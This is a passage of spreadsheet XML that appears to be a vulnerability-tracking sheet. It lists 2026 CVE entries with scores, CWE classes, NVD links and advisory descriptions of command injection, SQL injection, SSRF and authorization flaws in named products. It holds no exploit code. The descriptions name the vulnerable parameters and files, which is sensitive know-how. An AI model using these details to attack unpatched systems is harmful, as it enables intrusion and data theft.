      </c>
      <c r="D1455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1455" s="5" t="inlineStr"/>
      <c r="F1455" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1455" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1455" s="5" t="inlineStr"/>
      <c r="I1455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1455" s="5" t="inlineStr"/>
      <c r="K1455" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1455" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t>
        </is>
      </c>
    </row>
    <row r="1456">
      <c r="A1456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80214</t>
        </is>
      </c>
      <c r="C1456" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1456" s="5" t="inlineStr"/>
      <c r="F1456" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1456" s="5" t="inlineStr"/>
      <c r="H1456" s="5" t="inlineStr"/>
      <c r="I1456" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1456" s="5" t="inlineStr"/>
      <c r="K1456" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1456" s="5" t="inlineStr">
        <is>
          <t>LibreNMS’s Virtualization Discovery module is vulnerable to command line injection. An authenticated admin user can execute arbitrary code on the host server.</t>
        </is>
      </c>
      <c r="M1456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80214</t>
        </is>
      </c>
    </row>
    <row r="1457">
      <c r="A1457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8044</t>
        </is>
      </c>
      <c r="C1457" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1457" s="5" t="inlineStr"/>
      <c r="F1457" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1457" s="5" t="inlineStr"/>
      <c r="H1457" s="5" t="inlineStr"/>
      <c r="I1457" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1457" s="5" t="inlineStr"/>
      <c r="K1457" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1457" s="5" t="inlineStr">
        <is>
          <t>CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability exists that could cause remote code execution by an attacker with a privileged account when malicious arguments are provided as backup configuration parameters.</t>
        </is>
      </c>
      <c r="M1457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8044</t>
        </is>
      </c>
    </row>
    <row r="1458">
      <c r="A1458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81213</t>
        </is>
      </c>
      <c r="C1458" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1458" s="5" t="inlineStr"/>
      <c r="F1458" s="5" t="inlineStr"/>
      <c r="G1458" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1458" s="5" t="inlineStr"/>
      <c r="I1458" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1458" s="5" t="inlineStr"/>
      <c r="K1458" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1458" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to obtain sensitive information from internal network resources due to improper validation of user-supplied URLs.</t>
        </is>
      </c>
      <c r="M1458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81213</t>
        </is>
      </c>
    </row>
    <row r="1459">
      <c r="A1459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81789</t>
        </is>
      </c>
      <c r="C1459" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1459" s="5" t="inlineStr"/>
      <c r="F1459" s="5" t="inlineStr"/>
      <c r="G1459" s="5" t="inlineStr"/>
      <c r="H1459" s="5" t="inlineStr"/>
      <c r="I1459" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1459" s="5" t="inlineStr"/>
      <c r="K1459" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1459" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Arbitrary File Deletion in Advanced Product Fields Extended for WooCommerce &lt;= 3.1.6 versions.</t>
        </is>
      </c>
      <c r="M1459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81789</t>
        </is>
      </c>
    </row>
    <row r="1460">
      <c r="A1460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81889</t>
        </is>
      </c>
      <c r="C1460" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1460" s="5" t="inlineStr"/>
      <c r="F1460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1460" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1460" s="5" t="inlineStr"/>
      <c r="I1460" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1460" s="5" t="inlineStr"/>
      <c r="K1460" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1460" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, elFinder URL uploads in php/elFinder.class.php can bypass server-side request forgery protections when PHP cURL is unavailable because validate_address() validates $info['ip'], but get_remote_contents() selects fsock_get_contents(), which connects to $arr['host'] and performs a second DNS resolution. An attacker able to submit a URL upload can use DNS rebinding to have the first resolution return a public address and the connection resolution return a loopback or private address, causing the internal HTTP response body to be stored as an uploaded file and made readable through elFinder. After a successful fetch, get_headers($url, true) separately requests the original hostname without reusing the validated and pinned connection, creating an additional blind server-side request forgery path even when curl_get_contents() is selected. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="M1460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81889</t>
        </is>
      </c>
    </row>
    <row r="1461">
      <c r="A1461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82304</t>
        </is>
      </c>
      <c r="C1461" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1461" s="5" t="inlineStr"/>
      <c r="F1461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1461" s="5" t="inlineStr"/>
      <c r="H1461" s="5" t="inlineStr"/>
      <c r="I1461" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1461" s="5" t="inlineStr"/>
      <c r="K1461" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1461" s="5" t="inlineStr">
        <is>
          <t>The Music Store  WordPress plugin before 1.4.5 does not sanitise and escape user input before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.</t>
        </is>
      </c>
      <c r="M1461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82304</t>
        </is>
      </c>
    </row>
    <row r="1462">
      <c r="A1462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82461</t>
        </is>
      </c>
      <c r="C1462" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1462" s="5" t="inlineStr"/>
      <c r="F1462" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1462" s="5" t="inlineStr"/>
      <c r="H1462" s="5" t="inlineStr"/>
      <c r="I1462" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J1462" s="5" t="inlineStr"/>
      <c r="K1462" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1462" s="5" t="inlineStr">
        <is>
          <t>pac4j-oidc before 6.5.6 fails to verify access token signatures, issuers, audiences, or expiry when extracting Keycloak realm and client roles. Attackers can forge access tokens with administrative roles paired with valid ID tokens to bypass authorization checks in applications relying on pac4j role validation.</t>
        </is>
      </c>
      <c r="M1462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82461</t>
        </is>
      </c>
    </row>
    <row r="1463">
      <c r="A1463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82475</t>
        </is>
      </c>
      <c r="C1463" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1463" s="5" t="inlineStr"/>
      <c r="F1463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1463" s="5" t="inlineStr"/>
      <c r="H1463" s="5" t="inlineStr"/>
      <c r="I1463" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J1463" s="5" t="inlineStr"/>
      <c r="K1463" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1463" s="5" t="inlineStr">
        <is>
          <t>iFlytek astron-agent through 1.1.1 contains an authorization bypass vulnerability in the copyFlow endpoint that fails to validate workflow ownership. Authenticated attackers can enumerate workflow identifiers and overwrite other tenants' workflows or copy private workflows to read their definitions.</t>
        </is>
      </c>
      <c r="M1463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82475</t>
        </is>
      </c>
    </row>
    <row r="1464">
      <c r="A1464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82684</t>
        </is>
      </c>
      <c r="C1464" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1464" s="5" t="inlineStr"/>
      <c r="F1464" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1464" s="5" t="inlineStr"/>
      <c r="H1464" s="5" t="inlineStr"/>
      <c r="I1464" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1464" s="5" t="inlineStr"/>
      <c r="K1464" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1464" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a Missing Authorization vulnerability. This could allow an attacker to extract system credentials, configurations, or flash contents.</t>
        </is>
      </c>
      <c r="M1464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82684</t>
        </is>
      </c>
    </row>
    <row r="1465">
      <c r="A1465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82712</t>
        </is>
      </c>
      <c r="C1465" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1465" s="5" t="inlineStr"/>
      <c r="F1465" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1465" s="5" t="inlineStr"/>
      <c r="H1465" s="5" t="inlineStr"/>
      <c r="I1465" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1465" s="5" t="inlineStr"/>
      <c r="K1465" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L1465" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a cross-site request forgery vulnerability. This could allow an attacker to perform state changing operations on the device.</t>
        </is>
      </c>
      <c r="M1465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82712</t>
        </is>
      </c>
    </row>
    <row r="1466">
      <c r="A1466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84068</t>
        </is>
      </c>
      <c r="C1466" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1466" s="5" t="inlineStr"/>
      <c r="F1466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1466" s="5" t="inlineStr"/>
      <c r="H1466" s="5" t="inlineStr"/>
      <c r="I1466" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1466" s="5" t="inlineStr"/>
      <c r="K1466" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1466" s="5" t="inlineStr">
        <is>
          <t>The Quentn WP WordPress plugin before 1.2.15 does not adequately escape a request parameter before using it in an unprepared SQL query, allowing unauthenticated attackers to extract arbitrary data from the database via SQL injection.</t>
        </is>
      </c>
      <c r="M1466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84068</t>
        </is>
      </c>
    </row>
    <row r="1467">
      <c r="A1467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84194</t>
        </is>
      </c>
      <c r="C1467" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1467" s="5" t="inlineStr"/>
      <c r="F1467" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G1467" s="5" t="inlineStr"/>
      <c r="H1467" s="5" t="inlineStr"/>
      <c r="I1467" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1467" s="5" t="inlineStr"/>
      <c r="K1467" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1467" s="5" t="inlineStr">
        <is>
          <t>LibreNMS versions &gt;= 23.10.0 and &lt; 26.2.0 (fixed in 26.4.0) contain an authenticated OS command injection vulnerability in libvirt discovery. When libvirt support is enabled (enable_libvirt=true), the device hostname ($this-&gt;getDevice()-&gt;hostname) is concatenated into shell commands (ssh, virsh list/dumpxml/domstate) in VminfoLibvirt.php and passed to exec() without escapeshellarg() or argument separation. An authenticated admin can set a crafted device hostname to inject arbitrary OS commands, leading to remote code execution in the discovery worker context.</t>
        </is>
      </c>
      <c r="M1467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84194</t>
        </is>
      </c>
    </row>
    <row r="1468">
      <c r="A1468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84203</t>
        </is>
      </c>
      <c r="C1468" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1468" s="5" t="inlineStr"/>
      <c r="F1468" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1468" s="5" t="inlineStr"/>
      <c r="H1468" s="5" t="inlineStr"/>
      <c r="I1468" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1468" s="5" t="inlineStr"/>
      <c r="K1468" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L1468" s="5" t="inlineStr">
        <is>
          <t>Memos versions 0.26.0 through 0.30.0 fail to revoke refresh tokens when a user changes their password, allowing attackers to maintain account access. An attacker with a stolen refresh token can call the RefreshToken RPC to obtain new access tokens and rotate the refresh token indefinitely, bypassing the password change security measure.</t>
        </is>
      </c>
      <c r="M1468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84203</t>
        </is>
      </c>
    </row>
    <row r="1469">
      <c r="A1469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84452</t>
        </is>
      </c>
      <c r="C1469" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1469" s="5" t="inlineStr"/>
      <c r="F1469" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1469" s="5" t="inlineStr">
        <is>
          <t>windows, python</t>
        </is>
      </c>
      <c r="H1469" s="5" t="inlineStr"/>
      <c r="I1469" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1469" s="5" t="inlineStr"/>
      <c r="K1469" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-942</t>
        </is>
      </c>
      <c r="L1469" s="5" t="inlineStr">
        <is>
          <t>Windows ML CLI is a command line tool for building portable, performant, and high-quality AI models for Windows ML. Prior to 0.4.0, the src/winml/modelkit/serve/cli_api.py component exposes WinML CLI commands through a localhost HTTP API without authentication and configures the allow_origins setting as a wildcard in both src/winml/modelkit/serve/cli_api.py and src/winml/modelkit/serve/app.py. A malicious website loaded by a user can send cross-origin requests to /v1/cli/build or /v1/cli/config and set the trust_remote_code parameter to true, which is converted to the --trust-remote-code command-line flag without validation. This reaches AutoConfig.from_pretrained with trust_remote_code=True in src/winml/modelkit/loader/_autoconfig.py and imports Python code from an attacker-controlled model repository, resulting in arbitrary code execution as the server user. This issue is fixed in version 0.4.0.</t>
        </is>
      </c>
      <c r="M1469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t>
        </is>
      </c>
    </row>
    <row r="1470">
      <c r="A1470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85217</t>
        </is>
      </c>
      <c r="C1470" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1470" s="5" t="inlineStr"/>
      <c r="F1470" s="5" t="inlineStr"/>
      <c r="G1470" s="5" t="inlineStr"/>
      <c r="H1470" s="5" t="inlineStr"/>
      <c r="I1470" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1470" s="5" t="inlineStr"/>
      <c r="K1470" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="L1470" s="5" t="inlineStr">
        <is>
          <t>A maliciously crafted add-in, when installed and executed in Autodesk Fusion Desktop, can modify persistent network proxy settings without user notification or consent. A successful exploit may allow an attacker to redirect authenticated Fusion network traffic through an attacker-controlled proxy, potentially exposing sensitive information with the current user.</t>
        </is>
      </c>
      <c r="M1470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85217</t>
        </is>
      </c>
    </row>
    <row r="1471">
      <c r="A1471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85388</t>
        </is>
      </c>
      <c r="C1471" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1471" s="5" t="inlineStr"/>
      <c r="F1471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1471" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1471" s="5" t="inlineStr"/>
      <c r="I1471" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1471" s="5" t="inlineStr"/>
      <c r="K1471" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1471" s="5" t="inlineStr">
        <is>
          <t>Worklenz through 3.0.0 fails to properly validate the sort-field query parameter in pagination helper functions, allowing authenticated users to inject arbitrary PostgreSQL expressions into ORDER BY clauses. Attackers can use time-based and boolean-based blind SQL injection techniques to extract sensitive database content including password hashes from other tenants. This is an incomplete fix for CVE-2026-25947.</t>
        </is>
      </c>
      <c r="M1471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85388</t>
        </is>
      </c>
    </row>
    <row r="1472">
      <c r="A1472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85546</t>
        </is>
      </c>
      <c r="C1472" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1472" s="5" t="inlineStr"/>
      <c r="F1472" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1472" s="5" t="inlineStr"/>
      <c r="H1472" s="5" t="inlineStr"/>
      <c r="I1472" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1472" s="5" t="inlineStr"/>
      <c r="K1472" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L1472" s="5" t="inlineStr">
        <is>
          <t>MISP contains a cross-site request forgery (CSRF) vulnerability in the sharing group quick-edit functionality. The addOrg, removeOrg, addServer, and removeServer actions share the __initialiseSGQuickEdit() helper, where the HTTP method validation intended to restrict these operations to POST requests was commented out.
As a result, these state-changing actions could be invoked using GET requests. An attacker could craft a URL targeting one of the affected actions and cause an authenticated MISP user with sufficient privileges to request it, for example through a malicious link or embedded web resource.
Successful exploitation could modify the membership of a MISP sharing group without the victim intentionally performing the operation. Depending on the action performed, an attacker could add or remove organisations or servers from a sharing group, potentially granting unintended access to information distributed through that sharing group or disrupting legitimate information sharing.
The patch restores HTTP method enforcement centrally in __initialiseSGQuickEdit() by calling allowMethod(['post']), ensuring that all four affected quick-edit operations require POST requests and are therefore subject to the application's normal protections for state-changing requests.</t>
        </is>
      </c>
      <c r="M1472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85546</t>
        </is>
      </c>
    </row>
    <row r="1473">
      <c r="A1473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86167</t>
        </is>
      </c>
      <c r="C1473" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1473" s="5" t="inlineStr"/>
      <c r="F1473" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G1473" s="5" t="inlineStr"/>
      <c r="H1473" s="5" t="inlineStr"/>
      <c r="I1473" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1473" s="5" t="inlineStr"/>
      <c r="K1473" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L1473" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Tenda HG10 300001138. Impacted is the function formgponConf of the file /boaform/admin/formgponConf of the component Boa. The manipulation of the argument fmgpon_loid leads to os command injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="M1473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86167</t>
        </is>
      </c>
    </row>
    <row r="1474">
      <c r="A1474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86185</t>
        </is>
      </c>
      <c r="C1474" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1474" s="5" t="inlineStr"/>
      <c r="F1474" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1474" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1474" s="5" t="inlineStr"/>
      <c r="I1474" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1474" s="5" t="inlineStr"/>
      <c r="K1474" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L1474" s="5" t="inlineStr">
        <is>
          <t>Bilibili Desktop through 1.18.0 disables TLS certificate verification process-wide and executes unsigned remote JavaScript configuration without integrity checks. An attacker in an on-path network position can intercept configuration fetches, inject arbitrary JavaScript executed in the renderer with access to the privileged IPC bridge, and execute system commands or steal login credentials.</t>
        </is>
      </c>
      <c r="M1474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86185</t>
        </is>
      </c>
    </row>
    <row r="1475">
      <c r="A1475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86299</t>
        </is>
      </c>
      <c r="C1475" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1475" s="5" t="inlineStr"/>
      <c r="F1475" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="G1475" s="5" t="inlineStr"/>
      <c r="H1475" s="5" t="inlineStr"/>
      <c r="I1475" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1475" s="5" t="inlineStr"/>
      <c r="K1475" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L1475" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Linksys RE7000 2.0.15. This affects the function platform_event_pingTest of the file /cgi-bin/json.cgi?PingTest of the component PingTest Handler. The manipulation of the argument pingTestIp/pingTestPktSize/pingTestTimes results in os command injection. The attack can be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M1475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86299</t>
        </is>
      </c>
    </row>
    <row r="1476">
      <c r="A1476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86437</t>
        </is>
      </c>
      <c r="C1476" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1476" s="5" t="inlineStr"/>
      <c r="F1476" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1476" s="5" t="inlineStr"/>
      <c r="H1476" s="5" t="inlineStr"/>
      <c r="I1476" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1476" s="5" t="inlineStr"/>
      <c r="K1476" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1476" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard before 1.3.2 authorizes the POST /admin/settings/core-upgrades/upload endpoint with only the settings.edit permission, allowing non-Superadmin administrators to upload and extract arbitrary zip archives over the live application source code. Attackers can upload a malicious archive containing modified application files such as routes/web.php with embedded system commands, which execute as the web server user with access to environment secrets and database credentials.</t>
        </is>
      </c>
